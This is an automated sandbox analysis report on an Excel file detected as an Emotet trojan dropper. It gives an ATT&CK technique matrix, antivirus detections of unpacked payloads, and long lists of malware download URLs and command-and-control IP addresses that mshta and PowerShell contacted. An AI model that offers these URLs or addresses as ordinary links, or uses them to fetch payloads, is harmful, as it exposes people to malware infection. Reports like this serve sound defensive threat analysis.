Domain Accounts	13 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	21 Scripting	Security Account Manager	38 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	21 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	122 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Service Execution	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 PowerShell	Rc.common	Rc.common	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Rundll32	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
80_513972285.xls	33%	ReversingLabs	Document-Excel.Trojan.Emotet

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\QWER.dll	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.rundll32.exe.2280000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.3060000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.3150000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.27a0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2890000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.420000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2830000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2810000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2100000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.3e0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.610000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.28a0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2860000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.330000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2080000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2130000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
16.2.rundll32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.6c0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.440000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.26d0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
14.2.rundll32.exe.330000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.31c0000.15.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.3190000.14.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.26b0000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.190000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.2840000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.430000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.28c0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2740000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2160000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2730000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.460000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.27a0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.rundll32.exe.340000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.2340000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2890000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
11.2.rundll32.exe.470000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.4f0000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.23c0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.200000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2dc0000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.380000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.4f0000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.28f0000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2950000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.23f0000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.260000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.3030000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
11.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
17.2.rundll32.exe.4c0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.3160000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.630000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.660000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.2e10000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.2870000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2490000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.300000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.27c0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.180000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
10.2.rundll32.exe.2ed0000.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.2e00000.12.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
9.2.rundll32.exe.1c0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
15.2.rundll32.exe.2170000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
12.2.rundll32.exe.2700000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.2890000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
kuyporn.com	10%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://kuyporn.com/wp-content/XS	100%	Avira URL Cloud	malware
http://docs-construction.com/wp-admin/JJEf0kEA5/PE3	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlMuzL	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlWinSta0	100%	Avira URL Cloud	malware
https://algzor.c	0%	Avira URL Cloud	safe
http://91.240.118.168/qqw/aas/se.htmlfunction	100%	Avira URL Cloud	malware
https://grupomartinsanchez.com/w	100%	Avira URL Cloud	malware
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlv1.0	100%	Avira URL Cloud	malware
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3	100%	Avira URL Cloud	malware
http://kuyporn.c	0%	Avira URL Cloud	safe
https://elroieyecentre.org/cgi-b	100%	Avira URL Cloud	malware
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3	100%	Avira URL Cloud	malware
http://jeffreylubin.igclout.com/wp-admin/vzOG/	100%	Avira URL Cloud	malware
http://91.240.11	0%	URL Reputation	safe
http://kuyporn.com/wp-content/XSs5/	100%	Avira URL Cloud	malware
http://docs-construction.com/wp-admin/JJEf0kEA5/	100%	Avira URL Cloud	malware
http://flybustravel.com/cgi-bin/2TjUH/	100%	Avira URL Cloud	malware
http://www.protware.com/	0%	URL Reputation	safe
http://wallacebradley.com/css/Yc	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlXtrP	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.pngPE3	100%	Avira URL Cloud	malware
http://wallacebradley.com/css/YcDc927SJR/	100%	Avira URL Cloud	malware
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3	100%	Avira URL Cloud	malware
https://algzor.com/wp-includes/g	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlEtrM	100%	Avira URL Cloud	malware
http://wallacebradley.com/css/YcDc927SJR/PE3	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html	100%	Avira URL Cloud	malware
http://docs-construction.com/wp-	0%	Avira URL Cloud	safe
http://91.240.118.168/qqw/aas/se.htmlA(	100%	Avira URL Cloud	malware
https://bluwom-milano.com/wp-content/FEj3y4z/	100%	Avira URL Cloud	malware
https://esaci-egypt.com/wp-includes/W7qXVeGp/	100%	Avira URL Cloud	malware
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlO(	100%	Avira URL Cloud	malware
http://kuyporn.com	100%	Avira URL Cloud	malware
http://flybustravel.com/cgi-bin/2TjUH/PE3	100%	Avira URL Cloud	malware
http://kuyporn.com/wp-content/XSs5/PE3	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.html	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlB	100%	Avira URL Cloud	malware
https://bluwom-milano.com/wp-con	100%	Avira URL Cloud	malware
https://bluwom-milano.com/wp-content/FEj3y4z/PE3	100%	Avira URL Cloud	malware
http://jeffreylubin.igclout.com	100%	Avira URL Cloud	malware
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/	100%	Avira URL Cloud	malware
http://www.protware.com	0%	URL Reputation	safe
http://91.240.118.168/qqw/aas/se	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.png	100%	Avira URL Cloud	malware
https://thaireportchannel.com/wp	100%	Avira URL Cloud	malware
http://jeffreylubin.igclout.com/	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlC:	100%	Avira URL Cloud	malware
http://flybustravel.com/cgi-bin/	100%	Avira URL Cloud	malware
http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3	100%	Avira URL Cloud	malware
https://esaci-egypt.com/wp-inclu	100%	Avira URL Cloud	malware
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/	100%	Avira URL Cloud	malware
http://91.240.118.168	100%	URL Reputation	malware
https://algzor.com/wp-includes/ghFXVrGLEh/PE3	100%	Avira URL Cloud	malware
https://algzor.com/wp-includes/ghFXVrGLEh/	100%	Avira URL Cloud	malware
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/	100%	Avira URL Cloud	malware
http://91.240.118.168/qqw/aas/se.htmlmshta	100%	Avira URL Cloud	malware
https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3	100%	Avira URL Cloud	malware
https://pcovestudio.com/wp-admin	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kuyporn.com	172.67.149.209	true	true	10%, Virustotal, Browse	unknown
jeffreylubin.igclout.com	74.208.236.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://jeffreylubin.igclout.com/wp-admin/vzOG/	true	Avira URL Cloud: malware	unknown
http://kuyporn.com/wp-content/XSs5/	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.html	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.png	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://kuyporn.com/wp-content/XS	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://docs-construction.com/wp-admin/JJEf0kEA5/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlMuzL	mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlWinSta0	mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://algzor.c	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.168/qqw/aas/se.htmlfunction	mshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://grupomartinsanchez.com/w	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlv1.0	mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://kuyporn.c	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://elroieyecentre.org/cgi-b	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.11	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	low
http://docs-construction.com/wp-admin/JJEf0kEA5/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://flybustravel.com/cgi-bin/2TjUH/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.protware.com/	mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://wallacebradley.com/css/Yc	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlXtrP	mshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.pngPE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://wallacebradley.com/css/YcDc927SJR/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://algzor.com/wp-includes/g	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlEtrM	mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://wallacebradley.com/css/YcDc927SJR/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html	mshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://docs-construction.com/wp-	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.240.118.168/qqw/aas/se.htmlA(	mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bluwom-milano.com/wp-content/FEj3y4z/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://esaci-egypt.com/wp-includes/W7qXVeGp/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://thaireportchannel.com/wp-includes/KaWZp0odkEO/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlO(	mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://kuyporn.com	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://flybustravel.com/cgi-bin/2TjUH/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://kuyporn.com/wp-content/XSs5/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlB	80_513972285.xls.0.dr	true	Avira URL Cloud: malware	unknown
https://bluwom-milano.com/wp-con	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bluwom-milano.com/wp-content/FEj3y4z/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jeffreylubin.igclout.com	powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.protware.com	mshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.240.118.168/qqw/aas/se	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://thaireportchannel.com/wp	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://jeffreylubin.igclout.com/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlC:	mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://flybustravel.com/cgi-bin/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://esaci-egypt.com/wp-inclu	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://algzor.com/wp-includes/ghFXVrGLEh/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://algzor.com/wp-includes/ghFXVrGLEh/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.168/qqw/aas/se.htmlmshta	mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://pcovestudio.com/wp-admin	powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
198.199.98.78	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
194.9.172.107	unknown	unknown	207992	FEELBFR	true
59.148.253.194	unknown	Hong Kong	9269	HKBN-AS-APHongKongBroadbandNetworkLtdHK	true
74.207.230.120	unknown	United States	63949	LINODE-APLinodeLLCUS	true
103.41.204.169	unknown	Indonesia	58397	INFINYS-AS-IDPTInfinysSystemIndonesiaID	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
91.240.118.168	unknown	unknown	49453	GLOBALLAYERNL	true
139.196.72.155	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
217.182.143.207	unknown	France	16276	OVHFR	true
203.153.216.46	unknown	Indonesia	45291	SURF-IDPTSurfindoNetworkID	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
37.59.209.141	unknown	France	16276	OVHFR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
172.67.149.209	kuyporn.com	United States	13335	CLOUDFLARENETUS	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
74.208.236.157	jeffreylubin.igclout.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
54.37.228.122	unknown	France	16276	OVHFR	true
185.168.130.138	unknown	Ukraine	49720	GIGACLOUD-ASUA	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
118.98.72.86	unknown	Indonesia	7713	TELKOMNET-AS-APPTTelekomunikasiIndonesiaID	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562424
Start date:	28.01.2022
Start time:	21:23:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 5s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	80_513972285.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
